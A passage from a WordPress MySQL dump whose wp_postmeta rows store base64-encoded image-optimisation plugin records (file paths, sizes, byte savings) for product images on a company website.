DczMTc0NTU1OTI5LTIyNXg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMjI1eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDIyOCwiaWQiOjEyNDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTUxMHg2OC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS01MTB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTUxMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQyMzAsImlkIjoxMjQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTExNHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMTE0eDY4LmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTExNHg2OC5qcGciLCJyZWR1Y3Rpb24iOjQ0MCwidGltZSI6MTQ4MzU3NDIzMiwiaWQiOjEyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMTYweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS0xNjB4NjguanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMTYweDY4LmpwZyIsInJlZHVjdGlvbiI6ODMsInRpbWUiOjE0ODM1NzQyMzQsImlkIjoxMjQxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTE4MHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMTgweDY4LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcGxhc3RpYy1tZXRhbC1nbGFzcy1jbGVhbmVyLWUxNDczMTc0NTU1OTI5LTE4MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjE0NiwidGltZSI6MTQ4MzU3NDIzNiwiaWQiOjEyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMjQ3eDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS0yNDd4NjguanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMjQ3eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDIzOCwiaWQiOjEyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMzAweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS0zMDB4NjguanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktMzAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDI0MCwiaWQiOjEyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktNDAweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3BsYXN0aWMtbWV0YWwtZ2xhc3MtY2xlYW5lci1lMTQ3MzE3NDU1NTkyOS00MDB4NjguanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9wbGFzdGljLW1ldGFsLWdsYXNzLWNsZWFuZXItZTE0NzMxNzQ1NTU5MjktNDAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDI0MiwiaWQiOjEyNDF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29674, 1240, 'wpfc_optimisation_reduction', '1374'); 
INSERT INTO `wp_postmeta` VALUES (29675, 1240, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQuanBnIiwid2lkdGgiOjk0NSwiaGVpZ2h0Ijo2OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQuanBnIiwicmVkdWN0aW9uIjo3OTUsInRpbWUiOjE0ODM1NzQyNDksImlkIjoiMTI0MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC0zNDB4NjguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTM0MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTM0MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQyNTEsImlkIjoxMjQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtODAweDU4LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC04MDB4NTguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC04MDB4NTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MjUzLCJpZCI6MTI0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTc2OHg1NS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjU1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtNzY4eDU1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtNzY4eDU1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDI1NSwiaWQiOjEyNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC0yNTB4NjguanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTI1MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTI1MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQyNTgsImlkIjoxMjQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtMjAweDY4LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC0yMDB4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC0yMDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MjYwLCJpZCI6MTI0MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTIyNXg2OC5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtMjI1eDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtMjI1eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDI2MiwiaWQiOjEyNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC01MTB4NjguanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTUxMHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTUxMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQyNjQsImlkIjoxMjQwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC0xMTR4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC0xMTR4NjguanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTExNHg2OC5qcGciLCJyZWR1Y3Rpb24iOjM5MiwidGltZSI6MTQ4MzU3NDI2NiwiaWQiOjEyNDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTE2MHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTE2MHg2OC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtMTYweDY4LmpwZyIsInJlZHVjdGlvbiI6MTIzLCJ0aW1lIjoxNDgzNTc0MjY4LCJpZCI6MTI0MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtMTgweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtMTgweDY4LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWEtaGVhZC1jbGVhbmVycy1lMTQ3MzE3NDQxODQzNC0xODB4NjguanBnIiwicmVkdWN0aW9uIjo1NCwidGltZSI6MTQ4MzU3NDI3MCwiaWQiOjEyNDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTI0N3g2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTI0N3g2OC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtMjQ3eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDI3MywiaWQiOjEyNDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTMwMHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTMwMHg2OC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtMzAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDI3NSwiaWQiOjEyNDB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTQwMHg2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpYS1oZWFkLWNsZWFuZXJzLWUxNDczMTc0NDE4NDM0LTQwMHg2OC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGlhLWhlYWQtY2xlYW5lcnMtZTE0NzMxNzQ0MTg0MzQtNDAweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDI3NywiaWQiOjEyNDB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29676, 1239, 'wpfc_optimisation_reduction', '1409'); 
INSERT INTO `wp_postmeta` VALUES (29677, 1239, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVycy1lMTQ3MzE3NDMyNTI0OC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcnMtZTE0NzMxNzQzMjUyNDguanBnIiwid2lkdGgiOjk0NSwiaGVpZ2h0Ijo2OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcnMtZTE0NzMxNzQzMjUyNDguanBnIiwicmVkdWN0aW9uIjo3NDMsInRpbWUiOjE0ODM1NzQyODMsImlkIjoiMTIzOSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvZmx1eC1yZW1vdmVycy1lMTQ3MzE3NDMyNTI0OC0zNDB4NjguanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXJzLWUxNDczMTc0MzI1MjQ4LTM0MHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9mbHV4LXJlbW92ZXJzLWUxNDczMTc0MzI1MjQ4LTM0MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQyODYsImlkIjoxMjM5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2ZsdXgtcmVtb3ZlcnMtZTE0NzMxNzQzMjUyNDgtODAweDU4LmpwZyIsIndpZHRoIjo4M